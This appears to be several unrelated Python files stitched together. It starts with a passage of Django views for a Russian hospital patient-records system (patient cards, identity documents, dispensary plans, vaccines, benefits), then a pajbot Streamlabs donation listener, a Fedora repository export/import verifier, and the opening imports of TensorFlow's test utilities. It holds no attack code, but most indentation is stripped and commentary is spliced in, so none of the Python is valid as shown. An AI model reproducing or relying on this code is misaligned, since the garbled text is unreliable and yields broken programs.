c.patients.send_patient(Card.objects.filter(individual=i, base__is_rmis=True)[0])
            except Exception:
messages.append("Синхронизация с РМИС не удалась")
individual_pk = i.pk
if request_data["card_pk"] < 0:
with transaction.atomic():
base = CardBase.objects.select_for_update().get(pk=request_data["base_pk"], internal_type=True)
c = Card(number=Card.next_l2_n(), base=base, individual=i, main_diagnosis="", main_address="", fact_address="")
c.save()
card_pk = c.pk
Log.log(card_pk, 30000, request.user.doctorprofile, request_data)
else:
card_pk = request_data["card_pk"]
c = Card.objects.get(pk=card_pk)
individual_pk = request_data["individual_pk"]
c.main_diagnosis = request_data["main_diagnosis"]
try:
vals = json.loads(request_data["main_address_full"])
c.main_address = vals['address']
c.main_address_fias = vals['fias']
c.main_address_details = vals['details']
    except Exception:
c.main_address = request_data["main_address"]
c.main_address_fias = None
c.main_address_details = None
try:
vals = json.loads(request_data["fact_address_full"])
c.fact_address = vals['address']
c.fact_address_fias = vals['fias']
c.fact_address_details = vals['details']
    except Exception:
c.fact_address = request_data["fact_address"]
c.fact_address_fias = None
c.fact_address_details = None
c.number_poliklinika = request_data.get("number_poli", "")
if request_data["custom_workplace"] or not Company.objects.filter(pk=request_data.get("work_place_db", -1)).exists():
c.work_place_db = None
c.work_place = request_data["work_place"] if request_data["custom_workplace"] else ''
else:
c.work_place_db = Company.objects.get(pk=request_data["work_place_db"])
c.work_place = ''
c.district_id = request_data["district"] if request_data["district"] != -1 else None
c.ginekolog_district_id = request_data["gin_district"] if request_data["gin_district"] != -1 else None
c.work_position = request_data["work_position"]
c.phone = request_data["phone"]
c.harmful_factor = request_data.get("harmful", "")
medbook_type = request_data.get("medbookType", "")
medbook_prefix = str(request_data.get("medbookPrefix", "")).strip()
medbook_number = str(request_data.get("medbookNumber", "-1"))
medbook_number_custom = str(request_data.get("medbookNumberCustom", "-1"))
medbook_number = medbook_number if medbook_type != 'custom' else medbook_number_custom
medbook_number_int = int(medbook_number) if medbook_number.isdigit() else None
if medbook_type == 'none' and c.medbook_type != 'none':
c.medbook_number = ''
c.medbook_type = medbook_type
else:
try:
with transaction.atomic():
base = CardBase.objects.select_for_update().get(pk=request_data["base_pk"], internal_type=True)
if medbook_type == 'custom' and medbook_number_int is not None and (c.medbook_number != medbook_number_int or c.medbook_prefix != medbook_prefix):
medbook_auto_start = SettingManager.get_medbook_auto_start()
if medbook_number_int <= 1 or medbook_auto_start <= medbook_number_int:
raise Exception("Некорректный номер мед.книжки")
if Card.objects.filter(medbook_number=medbook_number, base=base, medbook_prefix=medbook_prefix).exclude(pk=c.pk).exists():
raise Exception(f"Номер {medbook_prefix} {medbook_number} уже есть у другого пациента")
c.medbook_prefix = medbook_prefix
c.medbook_number = medbook_number_int
c.medbook_type = medbook_type
elif (c.medbook_type != 'auto' or c.medbook_number == '') and medbook_type == 'auto':
c.medbook_prefix = ''
c.medbook_number = Card.next_medbook_n()
c.medbook_type = medbook_type
except Exception as e:
messages.append(str(e))
c.save()
if c.individual.primary_for_rmis:
try:
c.individual.sync_with_rmis()
        except Exception:
messages.append("Синхронизация с РМИС не удалась")
result = "ok"
return JsonResponse({"result": result, "message": message, "messages": messages, "card_pk": card_pk, "individual_pk": individual_pk})
@login_required
@group_required("Управление иерархией истории")
def patients_card_archive(request):
request_data = json.loads(request.body)
pk = request_data['pk']
card = Card.objects.get(pk=pk)
card.is_archive = True
card.save()
return JsonResponse({"ok": True})
@login_required
@group_required("Управление иерархией истории")
def patients_card_unarchive(request):
request_data = json.loads(request.body)
pk = request_data['pk']
card = Card.objects.get(pk=pk)
if card.is_archive:
n = card.number
if Card.objects.filter(number=n, is_archive=False, base=card.base).exists():
return JsonResponse({"ok": False, "message": "fНомер {n} уже занят другой картой"})
card.is_archive = False
card.save()
return JsonResponse({"ok": True})
def individual_search(request):
result = []
request_data = json.loads(request.body)
tfoms_module = SettingManager.l2('tfoms')
family = request_data["family"]
name = request_data["name"]
patronymic = request_data["patronymic"]
birthday = request_data["birthday"]
forced_gender = []
if tfoms_module and family and name and birthday:
from_tfoms = match_patient(family, name, patronymic, birthday)
for row in from_tfoms:
Individual.import_from_tfoms(row, no_update=True)
forced_gender.append(row['gender'].lower())
for i in Individual.objects.filter(family=family, name=name, patronymic=patronymic, birthday=birthday):
result.append(
{
"pk": i.pk,
"fio": i.fio(full=True),
"docs": [
{**model_to_dict(x), "type_title": x.document_type.title}
for x in Document.objects.filter(individual=i, is_active=True).distinct("number", "document_type", "serial", "date_end", "date_start")
],
"l2_cards": [{"number": x.number, "pk": x.pk} for x in Card.objects.filter(individual=i, base__internal_type=True, is_archive=False)],
}
)
forced_gender.append(i.sex)
forced_gender = None if not forced_gender or forced_gender.count(forced_gender[0]) != len(forced_gender) else forced_gender[0]
return JsonResponse({"result": result, 'forced_gender': forced_gender})
def get_sex_by_param(request):
request_data = json.loads(request.body)
t = request_data.get("t")
v = request_data.get("v", "")
r = "м"
if t == "name":
p = Individual.objects.filter(name=v)
r = "м" if p.filter(sex__iexact="м").count() >= p.filter(sex__iexact="ж").count() else "ж"
if t == "family":
p = Individual.objects.filter(family=v)
r = "м" if p.filter(sex__iexact="м").count() >= p.filter(sex__iexact="ж").count() else "ж"
if t == "patronymic":
p = Individual.objects.filter(patronymic=v)
r = "м" if p.filter(sex__iexact="м").count() >= p.filter(sex__iexact="ж").count() else "ж"
return JsonResponse({"sex": r})
def edit_doc(request):
request_data = json.loads(request.body)
pk = request_data["pk"]
serial = request_data["serial"]
number = request_data["number"]
type_o = DocumentType.objects.get(pk=request_data["type"])
is_active = request_data["is_active"]
date_start = request_data["date_start"]
date_start = None if date_start == "" else date_start
date_end = request_data["date_end"]
date_end = None if date_end == "" else date_end
who_give = request_data["who_give"] or ""
if pk == -1:
card = Card.objects.get(pk=request_data["card_pk"])
d = Document(
document_type=type_o,
number=number,
serial=serial,
from_rmis=False,
date_start=date_start,
date_end=date_end,
who_give=who_give,
is_active=is_active,
individual=Individual.objects.get(pk=request_data["individual_pk"]),
)
d.save()
cdu = CardDocUsage.objects.filter(card=card, document__document_type=type_o)
if not cdu.exists():
CardDocUsage(card=card, document=d).save()
else:
for c in cdu:
c.document = d
c.save(update_fields=["document"])
Log.log(d.pk, 30002, request.user.doctorprofile, request_data)
else:
for d in Document.objects.filter(pk=pk, from_rmis=False):
d.number = number
d.serial = serial
d.is_active = is_active
d.date_start = date_start
d.date_end = date_end
d.who_give = who_give
d.save()
Log.log(pk, 30002, request.user.doctorprofile, request_data)
d = Document.objects.get(pk=pk)
try:
d.sync_rmis()
except Exception as e:
print('RMIS error', e) # noqa: T001
return JsonResponse({"ok": True})
def update_cdu(request):
request_data = json.loads(request.body)
card = Card.objects.get(pk=request_data["card_pk"])
doc = Document.objects.get(pk=request_data["doc"])
cdu = CardDocUsage.objects.filter(card=card, document__document_type=doc.document_type)
if not cdu.exists():
CardDocUsage(card=card, document=doc).save()
else:
for c in cdu:
c.document = doc
c.save(update_fields=["document"])
Log.log(card.pk, 30004, request.user.doctorprofile, request_data)
return JsonResponse({"ok": True})
def sync_rmis(request):
request_data = json.loads(request.body)
card = Card.objects.get(pk=request_data["card_pk"])
card.individual.sync_with_rmis()
return JsonResponse({"ok": True})
def sync_tfoms(request):
request_data = json.loads(request.body)
card = Card.objects.get(pk=request_data["card_pk"])
is_new, updated = card.individual.sync_with_tfoms()
return JsonResponse({"ok": True, "is_new": is_new, "updated": updated})
def update_wia(request):
request_data = json.loads(request.body)
card = Card.objects.get(pk=request_data["card_pk"])
key = request_data["key"]
if key in [x[0] for x in Card.AGENT_CHOICES]:
card.who_is_agent = key
card.save()
Log.log(card.pk, 30006, request.user.doctorprofile, request_data)
return JsonResponse({"ok": True})
def edit_agent(request):
request_data = json.loads(request.body)
key = request_data["key"]
card = None if not request_data["card_pk"] else Card.objects.get(pk=request_data["card_pk"])
parent_card = Card.objects.filter(pk=request_data["parent_card_pk"])
doc = request_data["doc"] or ''
clear = request_data["clear"]
need_doc = key in Card.AGENT_NEED_DOC
upd = {}
if clear or not card:
upd[key] = None
if need_doc:
upd[key + "_doc_auth"] = ''
if parent_card[0].who_is_agent == key:
upd["who_is_agent"] = ''
else:
upd[key] = card
if need_doc:
upd[key + "_doc_auth"] = doc
if key not in Card.AGENT_CANT_SELECT:
upd["who_is_agent"] = key
for card in parent_card:
for k, v in upd.items():
setattr(card, k, v)
card.save(update_fields=list(upd.keys()))
Log.log(request_data["parent_card_pk"], 30005, request.user.doctorprofile, request_data)
return JsonResponse({"ok": True})
def load_dreg(request):
request_data = json.loads(request.body)
data = []
diagnoses = set()
for a in DispensaryReg.objects.filter(card__pk=request_data["card_pk"]).order_by('date_start', 'pk'):
data.append(
{
"pk": a.pk,
"diagnos": a.diagnos,
"illnes": a.illnes,
"spec_reg": '' if not a.spec_reg else a.spec_reg.title,
"doc_start_reg": '' if not a.doc_start_reg else a.doc_start_reg.get_fio(),
"doc_start_reg_id": a.doc_start_reg_id,
"date_start": '' if not a.date_start else strdate(a.date_start),
"doc_end_reg": '' if not a.doc_end_reg else a.doc_end_reg.get_fio(),
"doc_end_reg_id": a.doc_end_reg_id,
"date_end": '' if not a.date_end else strdate(a.date_end),
"why_stop": a.why_stop,
}
)
if not a.date_end:
diagnoses.add(a.diagnos)
researches = []
specialities = []
researches_data = []
specialities_data = []
card = Card.objects.get(pk=request_data["card_pk"])
visits = VisitPurpose.objects.filter(title__icontains="диспансерн")
year = request_data.get('year', '2020')
for d in sorted(diagnoses):
need = DispensaryPlan.objects.filter(diagnos=d)
for i in need:
if i.research:
if i.research not in researches:
researches.append(i.research)
results = research_last_result_every_month([i.research], card, year)
plans = get_dispensary_reg_plans(card, i.research, None, year)
researches_data.append(
{
"type": "research",
"research_title": i.research.title,
"research_pk": i.research.pk,
"assign_research_pk": i.research.pk,
"assignment": False,
"diagnoses_time": [],
"results": results,
"plans": plans,
"max_time": 1,
"times": len([x for x in results if x]),
}
)
index_res = researches.index(i.research)
researches_data[index_res]['diagnoses_time'].append({"diagnos": i.diagnos, "times": i.repeat})
if i.speciality:
if i.speciality not in specialities:
specialities.append(i.speciality)
results = research_last_result_every_month(Researches.objects.filter(speciality=i.speciality), request_data["card_pk"], year, visits)
plans = get_dispensary_reg_plans(card, None, i.speciality, year)
spec_assign_research = Researches.objects.filter(speciality=i.speciality).first()
specialities_data.append(
{
"type": "speciality",
"research_title": i.speciality.title,
"research_pk": i.speciality.pk,
"assign_research_pk": spec_assign_research.pk if spec_assign_research else None,
"assignment": False,
"diagnoses_time": [],
"results": results,
"plans": plans,
"max_time": 1,
"times": len([x for x in results if x]),
}
)
index_spec = specialities.index(i.speciality)
specialities_data[index_spec]['diagnoses_time'].append({"diagnos": i.diagnos, "times": i.repeat})
researches_data.extend(specialities_data)
return JsonResponse({"rows": data, "researches_data": researches_data, "year": year})
def load_screening(request):
card_pk: int = data_parse(request.body, {'cardPk': int})[0]
screening = ScreeningRegPlan.get_screening_data(card_pk)
return JsonResponse({"data": screening})
def research_last_result_every_month(researches: List[Researches], card: Card, year: str, visits: Optional[List[VisitPurpose]] = None):
results = []
filter = {
"napravleniye__client": card,
"research__in": researches,
"time_confirmation__year": year,
}
if visits:
filter['purpose__in'] = visits
for i in range(12):
i += 1
iss: Optional[Issledovaniya] = Issledovaniya.objects.filter(**filter, time_confirmation__month=str(i)).order_by("-time_confirmation").first()
if iss:
date = str(localtime(iss.time_confirmation).day).rjust(2, '0')
results.append({"pk": iss.napravleniye_id, "date": date})
else:
results.append(None)
return results
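# Note added for clarity (not part of the original module): the helper above
# always returns a 12-element list, one slot per month of the given year; each
# slot is either None or {"pk": <direction id>, "date": "<zero-padded day>"}.
# A hypothetical card confirmed only in February would therefore yield:
#   [None, {"pk": 101, "date": "05"}, None, None, None, None,
#    None, None, None, None, None, None]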
def get_dispensary_reg_plans(card, research, speciality, year):
plan = [''] * 12
disp_plan = DispensaryRegPlans.objects.filter(card=card, research=research, speciality=speciality, date__year=year)
for d in disp_plan:
if d.date:
plan[d.date.month - 1] = str(d.date.day).rjust(2, '0')
return plan
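# Minimal sketch (hypothetical helper, added for illustration and not used by
# the views above): shows how the 12-slot list returned by
# get_dispensary_reg_plans lines up with calendar months.
def _example_format_dispensary_plan(card, research, year):
    plan = get_dispensary_reg_plans(card, research, None, year)
    return {f"{month:02d}.{year}": day or "-" for month, day in enumerate(plan, start=1)}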
def update_dispensary_reg_plans(request):
request_data = json.loads(request.body)
DispensaryRegPlans.update_plan(request_data["card_pk"], request_data["researches_data_def"], request_data["researches_data"], request_data["year"])
return JsonResponse({"ok": True})
def update_screening_reg_plan(request):
request_data = json.loads(request.body)
ScreeningRegPlan.update_plan(request_data)
return JsonResponse({"ok": True})
def load_vaccine(request):
request_data = json.loads(request.body)
data = []
for a in VaccineReg.objects.filter(card__pk=request_data["card_pk"]).order_by('date', 'pk'):
data.append({"pk": a.pk, "date": strdate(a.date) if a.date else '', "title": a.title, "series": a.series, "amount": a.amount, "method": a.method, "step": a.step, "tap": a.tap})
return JsonResponse({"rows": data})
def load_ambulatory_data(request):
request_data = json.loads(request.body)
data = []
for a in AmbulatoryData.objects.filter(card__pk=request_data["card_pk"]).order_by('date', 'pk'):
data.append({"pk": a.pk, "date": strdate(a.date) if a.date else '', "data": a.data})
return JsonResponse({"rows": data})
def load_benefit(request):
request_data = json.loads(request.body)
data = []
for a in BenefitReg.objects.filter(card__pk=request_data["card_pk"]).order_by('date_start', 'pk'):
data.append(
{
"pk": a.pk,
"benefit": str(a.benefit),
"registration_basis": a.registration_basis,
"doc_start_reg": '' if not a.doc_start_reg else a.doc_start_reg.get_fio(),
"doc_start_reg_id": a.doc_start_reg_id,
"date_start": '' if not a.date_start else strdate(a.date_start),
"doc_end_reg": '' if not a.doc_end_reg else a.doc_end_reg.get_fio(),
"doc_end_reg_id": a.doc_end_reg_id,
"date_end": '' if not a.date_end else strdate(a.date_end),
}
)
return JsonResponse({"rows": data})
def load_dreg_detail(request):
a = DispensaryReg.objects.get(pk=json.loads(request.body)["pk"])
data = {
"diagnos": a.diagnos + ' ' + a.illnes,
"date_start": None if not a.date_start else a.date_start,
"date_end": None if not a.date_end else a.date_end,
"close": bool(a.date_end),
"why_stop": a.why_stop,
"time_index": a.what_times,
"identified_index": a.how_identified,
}
return JsonResponse(data)
def load_vaccine_detail(request):
a = VaccineReg.objects.get(pk=json.loads(request.body)["pk"])
data = {
"date": a.date,
"direction": a.direction,
"title": a.title,
"series": a.series,
"amount": a.amount,
"method": a.method,
"step": a.step,
"tap": a.tap,
"comment": a.comment,
}
return JsonResponse(data)
def load_ambulatory_data_detail(request):
a = AmbulatoryData.objects.get(pk=json.loads(request.body)["pk"])
str_adate = str(a.date)[0:7]
data = {
"date": str_adate,
"data": a.data,
}
return JsonResponse(data)
def load_ambulatory_history(request):
request_data = json.loads(request.body)
result = AmbulatoryDataHistory.objects.filter(card__pk=request_data["card_pk"]).order_by('-created_at')
rows = [{'date': strdate(i.created_at), 'data': i.text} for i in result]
return JsonResponse({"rows": rows})
def load_benefit_detail(request):
pk = json.loads(request.body)["card_pk"]
if pk > -1:
a = BenefitReg.objects.get(pk=pk)
data = {
"benefit_id": a.benefit_id,
"registration_basis": a.registration_basis,
"date_start": '' if not a.date_start else a.date_start,
"date_end": '' if not a.date_end else a.date_end,
"close": bool(a.date_end),
}
else:
data = {
"benefit_id": -1,
"registration_basis": "",
"date_start": '',
"date_end": '',
"close": False,
}
return JsonResponse(
{
"types": [{"pk": -1, "title": 'Не выбрано'}, *[{"pk": x.pk, "title": str(x)} for x in BenefitType.objects.filter(hide=False).order_by('pk')]],
**data,
}
)
@transaction.atomic
def save_dreg(request):
rd = json.loads(request.body)
d = rd["data"]
pk = rd["pk"]
n = False
create_disp_record = False
if pk == -1:
a = DispensaryReg.objects.create(card_id=rd["card_pk"])
pk = a.pk
n = True
create_disp_record = True
else:
pk = rd["pk"]
a = DispensaryReg.objects.get(pk=pk)
Log.log(pk, 40000 if n else 40001, request.user.doctorprofile, rd)
c = False
def fd(s):
if '.' in s:
s = s.split('.')
s = '{}-{}-{}'.format(s[2], s[1], s[0])
return s
if (
not a.date_start
and d["date_start"]
or str(a.date_start) != fd(d["date_start"])
or a.spec_reg != request.user.doctorprofile.specialities
or a.doc_start_reg != request.user.doctorprofile
):
a.date_start = fd(d["date_start"])
a.doc_start_reg = request.user.doctorprofile
a.spec_reg = request.user.doctorprofile.specialities
c = True
if not a.date_end and d["close"] or (d["close"] and str(a.date_end) != fd(d["date_end"])):
a.date_end = fd(d["date_end"])
a.why_stop = d["why_stop"]
a.doc_end_reg = request.user.doctorprofile
c = True
elif d["close"] and a.why_stop != d["why_stop"]:
a.why_stop = d["why_stop"]
c = True
if not d["close"] and (a.date_end or a.why_stop):
a.date_end = None
a.why_stop = ''
a.doc_end_reg = None
c = True
i = d["diagnos"].split(' ')
ds = i.pop(0)
if len(i) == 0:
i = ''
else:
i = ' '.join(i)
if a.diagnos != ds or a.illnes != i:
a.diagnos = ds
a.illnes = i
if create_disp_record:
disp_obj = DispensaryReg.objects.filter(card_id=rd["card_pk"], diagnos=ds, date_start=fd(d["date_start"]), doc_start_reg=request.user.doctorprofile)
if disp_obj.exists():
a.delete()
return JsonResponse({"ok": False, "pk": -1, "c": False})
c = True
if d.get('identified_index', 0) != a.how_identified:
a.how_identified = d.get('identified_index', 0)
c = True
if d.get('time_index', 0) != a.what_times:
a.what_times = d.get('time_index', 0)
c = True
if c:
a.save()
return JsonResponse({"ok": True, "pk": pk, "c": c})
@transaction.atomic
def save_vaccine(request):
rd = json.loads(request.body)
d = rd["data"]
pk = rd["pk"]
n = False
if pk == -1:
a = VaccineReg.objects.create(card_id=rd["card_pk"])
pk = a.pk
n = True
else:
pk = rd["pk"]
a = VaccineReg.objects.get(pk=pk)
Log.log(pk, 70000 if n else 70001, request.user.doctorprofile, rd)
c = False
def fd(s):
if '.' in s:
s = s.split('.')
s = '{}-{}-{}'.format(s[2], s[1], s[0])
return s
if str(a.date) != fd(d["date"]):
a.date = fd(d["date"])
c = True
if a.direction != d["direction"]:
a.direction = d["direction"]
c = True
if a.title != d["title"]:
a.title = d["title"]
c = True
if a.series != d["series"]:
a.series = d["series"]
c = True
if a.amount != d["amount"]:
a.amount = d["amount"]
c = True
if a.step != d["step"]:
a.step = d["step"]
c = True
if a.tap != d["tap"]:
a.tap = d["tap"]
c = True
if a.comment != d["comment"]:
a.comment = d["comment"]
c = True
if a.method != d["method"]:
a.method = d["method"]
c = True
if not a.doc:
a.doc = request.user.doctorprofile
c = True
if c:
a.save()
return JsonResponse({"ok": True, "pk": pk, "c": c})
@transaction.atomic
def save_ambulatory_data(request):
rd = json.loads(request.body)
d = rd["data"]
pk = rd["pk"]
date_request = f"{d['date']}-01"
if pk == -1:
a = AmbulatoryData.objects.create(card_id=rd["card_pk"])
pk = a.pk
else:
pk = rd["pk"]
a = AmbulatoryData.objects.get(pk=pk)
c = False
def fd(s):
if '.' in s:
s = s.split('.')
s = '{}-{}-{}'.format(s[2], s[1], s[0])
return s
if str(a.date) != fd(date_request):
a.date = fd(date_request)
c = True
if a.data != d["data"]:
a.data = d["data"]
c = True
if not a.doc:
a.doc = request.user.doctorprofile
c = True
if c:
a.save()
AmbulatoryDataHistory.save_ambulatory_history(rd["card_pk"], request.user.doctorprofile)
return JsonResponse({"ok": True, "pk": pk, "c": c})
@transaction.atomic
def save_benefit(request):
rd = json.loads(request.body)
d = rd["data"]
pk = rd["pk"]
n = False
c = False
if pk == -1:
a = BenefitReg.objects.create(card_id=rd["card_pk"], benefit_id=d["benefit_id"])
pk = a.pk
n = True
else:
pk = rd["pk"]
a = BenefitReg.objects.get(pk=pk)
if a.benefit_id != d["benefit_id"]:
a.benefit_id = d["benefit_id"]
c = True
Log.log(pk, 50000 if n else 50001, request.user.doctorprofile, {**rd, "data": {**{k: v for k, v in rd["data"].items() if k not in ['types']}}})
def fd(s):
if '.' in s:
s = s.split('.')
s = '{}-{}-{}'.format(s[2], s[1], s[0])
return s
    if (not a.date_start and d["date_start"]) or str(a.date_start) != fd(d["date_start"]) or a.doc_start_reg != request.user.doctorprofile:
a.date_start = fd(d["date_start"])
a.doc_start_reg = request.user.doctorprofile
c = True
if a.registration_basis != d["registration_basis"]:
a.registration_basis = d["registration_basis"]
c = True
if not a.date_end and d["close"] or (d["close"] and a.doc_end_reg != request.user.doctorprofile) or (d["close"] and str(a.date_end) != fd(d["date_end"])):
a.date_end = fd(d["date_end"])
a.doc_end_reg = request.user.doctorprofile
c = True
if not d["close"] and a.date_end:
a.date_end = None
a.doc_end_reg = None
c = True
if c:
a.save()
return JsonResponse({"ok": True, "pk": pk, "c": c})
def load_anamnesis(request):
request_data = json.loads(request.body)
card = Card.objects.get(pk=request_data["card_pk"])
history = []
for a in AnamnesisHistory.objects.filter(card=card).order_by('-pk'):
history.append(
{
"pk": a.pk,
"text": a.text,
"who_save": {
"fio": a.who_save.get_fio(dots=True),
"department": a.who_save.podrazdeleniye.get_title(),
},
"datetime": a.created_at.astimezone(pytz.timezone(settings.TIME_ZONE)).strftime("%d.%m.%Y %X"),
}
)
data = {
"text": card.anamnesis_of_life,
"history": history,
}
return JsonResponse(data)
def save_anamnesis(request):
request_data = json.loads(request.body)
card = Card.objects.get(pk=request_data["card_pk"])
if card.anamnesis_of_life != request_data["text"]:
card.anamnesis_of_life = request_data["text"]
card.save()
AnamnesisHistory(card=card, text=request_data["text"], who_save=request.user.doctorprofile).save()
return JsonResponse({"ok": True})
def create_l2_individual_from_card(request):
request_data = json.loads(request.body)
polis = request_data['polis']
has_tfoms_data = False
if SettingManager.l2('tfoms'):
from_tfoms = match_enp(polis)
if from_tfoms:
has_tfoms_data = True
Individual.import_from_tfoms(from_tfoms, no_update=True)
if not has_tfoms_data:
Individual.import_from_tfoms(
{
"enp": polis,
"family": request_data['family'],
"given": request_data['name'],
"patronymic": request_data['patronymic'],
"gender": request_data['sex'],
"birthdate": request_data['bdate'],
},
no_update=True,
)
return JsonResponse({"ok": True})
def is_l2_card(request):
request_data = json.loads(request.body)
card = Card.objects.filter(number=request_data['number'], base__internal_type=True).first()
if card:
return JsonResponse({"ok": True, "individual_fio": card.individual.fio()})
else:
return JsonResponse({"ok": False})
|
streamlabs.py
|
import logging
import threading
import socketio
from pajbot.managers.handler import HandlerManager
from pajbot.managers.db import DBManager
from pajbot.models.user import User
from currency_converter import CurrencyConverter
log = logging.getLogger(__name__)
class StreamLabsNameSpace(socketio.ClientNamespace):
def on_connect(self):
log.info("Connected to Streamlabs, Wait for Events")
def on_event(self, data):
if data["type"] == "donation":
sub_data = data["message"][0]
amount = float(str(sub_data["amount"]))
username = str(sub_data["from"])
currency = str(sub_data["currency"])
c = CurrencyConverter()
log.info(username)
amount = round(c.convert(amount, currency, "USD"), 2)
with DBManager.create_session_scope() as db_session:
user = User.find_by_user_input(db_session, username)
if user is not None:
log.info(f"User {user} donated ${amount}")
HandlerManager.trigger("on_donate", user=user, amount=amount)
if "message" in data and "event" in data["message"]:
if data["message"]["event"] == "play":
if data["message"]["media"] is None: # no new song
HandlerManager.trigger("resume_spotify")
else: # a new song
username = data["message"]["media"]["action_by"]
title = data["message"]["media"]["media_title"]
HandlerManager.trigger("pause_spotify", requestor=username, title=title)
elif data["message"]["event"] == "updateControls": # On play or pause on streamlabs
HandlerManager.trigger("change_state", state=not data["message"]["controls"]["play"])
def on_disconnect(self):
log.error("Disconnected from steam elements")
HandlerManager.trigger("streamlabs_reconnect")
class StreamLabsManager:
def __init__(self, socket_access_token):
self.socket_access_token = socket_access_token
self.sio = socketio.Client()
self.sio.register_namespace(StreamLabsNameSpace(""))
HandlerManager.add_handler("streamlabs_reconnect", self.setupThread)
self.mainThread = None
self.setupThread()
def setupThread(self):
        if self.mainThread is not None and self.mainThread.is_alive():
            # threading.Thread has no stop(); drop the socket connection so the
            # previous connect() call can return before a new thread is started
            self.sio.disconnect()
self.mainThread = threading.Thread(target=self.connect)
self.mainThread.daemon = True
self.mainThread.start()
def connect(self):
self.sio.connect("https://sockets.streamlabs.com?token=" + self.socket_access_token)
|
verifier.py
|
from csv import DictWriter
import os
import datetime
import sys
import time
import threading
import traceback
from rdflib.compare import isomorphic
from rdflib import Graph
from bagit import Bag
from .constants import EXT_BINARY_EXTERNAL
from .iterators import FcrepoWalker, LocalWalker
from .resources import FedoraResource, LocalResource
from .model import Repository
class FedoraImportExportVerifier:
"""Contains logic for performing a verification."""
def __init__(self, config, loggers):
self.config = config
self.loggers = loggers
def verify_bag(self):
"""Verifies the structure of the bag"""
console = self.loggers.console
console.info("Verifying bag...")
bag = Bag(self.config.dir)
if bag.is_valid():
console.info("bag is valid :)")
else:
console.info("bag is invalid :(")
def execute(self):
"""Executes the verification process."""
config = self.config
output_dir = self.config.output_dir
loggers = self.loggers
logger = loggers.file_only
console = loggers.console
console_only = loggers.console_only
# Check the repository connection
repo = Repository(config, loggers)
console.info("Testing connection to {0}...".format(repo.base))
if repo.is_reachable():
console.info("Connection successful.")
else:
console.error(
"Connection to {0} failed. Exiting.".format(repo.base)
)
sys.exit(1)
# Set up csv file, if specified
os.makedirs(output_dir, exist_ok=True)
datestr = datetime.datetime.today().strftime('%Y%m%d-%H%M')
csvfilename = "{0}/report-{1}.csv".format(output_dir, datestr)
csvfile = open(csvfilename, "w")
fieldnames = ["number", "type", "original", "destination",
"verified",
"verification"]
writer = DictWriter(csvfile, fieldnames=fieldnames)
writer.writeheader()
console.info("Starting verification...")
if config.mode == "export":
tree = FcrepoWalker(config, logger)
elif config.mode == "import":
tree = LocalWalker(config, logger)
console.info(
"Running verification on Fedora 4 {0}".format(config.mode)
)
if config.bag:
self.verify_bag()
console.info("Commencing resource verification...")
success_count = 0
failure_count = 0
def total_count():
return success_count + failure_count
def log_summary(logger):
logger.info(
"Verified {} resources: successes = {}, failures = {}".format(
total_count(), success_count, failure_count)
)
def count_logger():
            while True:
time.sleep(10)
log_summary(console_only)
t = threading.Thread(target=count_logger)
t.daemon = True
t.start()
# Step through the tree and verify resources
for filepath in tree:
# iterator can return None, in which case skip
if filepath is not None:
try:
# path begins with repository base = fedora resource
if filepath.startswith(config.repobase):
original = FedoraResource(filepath, config, logger,
console)
if not original.is_reachable:
verified = False
verification = "original not reachable"
# path begins with local root dir = local resource
elif filepath.startswith(config.dir):
original = LocalResource(filepath, config, logger,
console)
# any other path indicates an error
else:
# TODO: Consider handling this error and continuing
logger.error(
"Resource in unexpected location."
)
sys.exit(1)
# if binaries not included in export
if not config.bin:
# skip binaries and fcr:metadata
if original.type == "binary" or \
original.origpath.endswith("/fcr:metadata"):
continue
# filter refs to binary resources from rdf resources
else:
original.filter_binary_refs()
# create object representing destination resource
if filepath.startswith(config.repobase):
destination = LocalResource(original.destpath,
config,
loggers.file_only,
loggers.console)
elif filepath.startswith(config.dir):
destination = FedoraResource(original.destpath,
config,
loggers.file_only,
loggers.console)
# analyze the resource type
if original.type == "binary":
if destination.origpath.endswith(EXT_BINARY_EXTERNAL):
if not self.config.external:
continue
if original.sha1 == destination.sha1:
verified = True
verification = original.sha1
else:
verified = False
verification = "{0} != {1}".format(
original.sha1, destination.sha1
)
elif original.type == "rdf":
# if legacyMode is set, filter graph on import
if config.legacyMode:
if config.mode == "export":
pass
elif config.mode == "import":
to_filter = destination.server_managed
                                for p in to_filter.predicates():
                                    # rdflib supports wildcard removal: drop every
                                    # triple whose predicate is server-managed
                                    original.graph.remove((None, p, None))
destination.graph = destination.minimal
# compare the original and destination graphs
if isomorphic(original.graph, destination.graph):
verified = True
verification = \
"{0} triples".format(len(original.graph))
else:
verified = False
verification = ("{0}+{1} triples - mismatch"
.format(
len(original.graph),
len(destination.graph)
))
logger.info(
"RESOURCE {0}: {1} {2}".format(
total_count(), original.location, original.type)
)
except Exception as ex:
traceback.print_exc()
verified = False
verification = ("Object could not be verified: {"
"0}".format(ex))
if not verified:
                    logger.warning(
"Resource Mismatch \"{}\"".format(original.relpath)
)
failure_count += 1
else:
success_count += 1
if config.verbose:
logger.info(" rel => {}".format(original.relpath))
logger.info(" orig => {}".format(original.origpath))
logger.info(" dest => {}".format(original.destpath))
logger_method = logger.info
if not verified:
                    logger_method = logger.warning
logger_method(
" Verified original to copy... {0} -- {1}".format(
verified, verification)
)
# write csv if exists
row = {"number": str(total_count()),
"type": original.type,
"original": original.origpath,
"destination": original.destpath,
"verified": str(verified),
"verification": verification}
writer.writerow(row)
log_summary(console)
console.info("Verification complete")
csvfile.close()
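# Illustrative driver sketch (assumed, not part of the original package): the
# verifier expects a config object exposing at least mode, dir, repobase,
# output_dir, bag, bin and verbose, plus a loggers object with console,
# console_only and file_only logger attributes.
#
#     verifier = FedoraImportExportVerifier(config, loggers)
#     verifier.execute()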
|
test_util.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# pylint: disable=invalid-name
"""Test utils for tensorflow."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import contextlib
import gc
import math
import random
import re
import tempfile
import threading
import numpy as np
import six
_portpicker_import_error = None
try:
import portpicker # pylint: disable=g-import-not-at-top
except ImportError as _error:
_portpicker_import_error = _error
portpicker = None
# pylint: disable=g-import-not-at-top
from google.protobuf import descriptor_pool
from google.protobuf import text_format
from tensorflow.core.framework import graph_pb2
from tensorflow.core.protobuf import config_pb2
